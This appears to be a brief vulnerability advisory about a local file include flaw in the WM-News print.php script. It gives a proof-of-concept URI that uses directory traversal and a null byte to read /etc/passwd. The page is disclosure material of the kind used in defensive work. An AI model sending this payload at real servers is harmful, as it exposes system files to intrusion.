• info
• discussion
• exploit
• solution
• references

WM-News Print.PHP Local File Include Vulnerability

An attacker can exploit this issue via a web-client.

The following proof-of-concept URI is available:http://localhost/newscript/print/print.php?ide=../../../../etc/passwd%00

• /data/vulnerabilities/exploits/19968.html